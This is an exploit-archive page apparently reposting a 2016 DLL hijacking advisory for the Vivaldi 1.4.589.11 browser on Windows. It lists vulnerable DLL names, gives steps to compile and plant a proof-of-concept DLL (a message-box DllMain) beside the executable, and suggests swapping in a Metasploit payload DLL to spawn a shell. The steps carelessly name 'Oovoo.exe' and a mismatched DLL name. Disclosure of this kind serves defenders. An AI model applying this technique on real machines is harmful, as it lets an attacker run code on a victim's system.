what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Vivaldi 1.4.589.11 DLL Hijacking

Vivaldi 1.4.589.11 DLL Hijacking
Posted Oct 28, 2016
Authored by Amir.ght

Vivaldi version 1.4.589.11 suffers from a DLL hijacking vulnerability.

tags | exploit
systems | windows
SHA-256 | cf886466c9c1d14450df4d7944e36410e55f380f972d4348a5d0cf7c1a15d39f

Vivaldi 1.4.589.11 DLL Hijacking

Change Mirror Download
# Exploit Title: Vivaldi browser DLL Hijacking
# Author: Ashiyane Digital Security Team
# Vendor Homepage: https://vivaldi.com/
# software link:
https://downloads.vivaldi.com/stable/Vivaldi.1.4.589.11.exe
# Tested on:Windows 7
# Date: 13-09-2016
----------------------------------------------------------------------------------------------------------
vulnerable DLLs :
api-ms-win-core-localization-l1-2-1.dll
api-ms-win-core-fibers-l1-1-1.dll
api-ms-win-core-synch-l1-2-0.dll
api-ms-win-core-datetime-l1-1-1.dll
api-ms-win-core-localization-obsolete-l1-2-0.dll
If an attacker can place the malicious dll with any names of above
series in same location with vivaldi.exe where
victim open vivaldi.exe it will load and run the attackers DLL
and code.
also can generate a msfpayload DLL and spawn a shell, for example.

----------------------------------------------------------------------------------------------------------
# Exploit:
1- Save and compile below C code to create vuln DLL

2- Place vuln DLL on Same Directory of Oovoo.exe

3- Open vivaldi.exe

//gcc test.c -o shcore.dll -shared
//this dll show a message box
#include <windows.h>
#define DllExport __declspec (dllexport)

BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}

int dll_hijack()
{
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}
#################
Discovered By : Amir.ght
#################
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close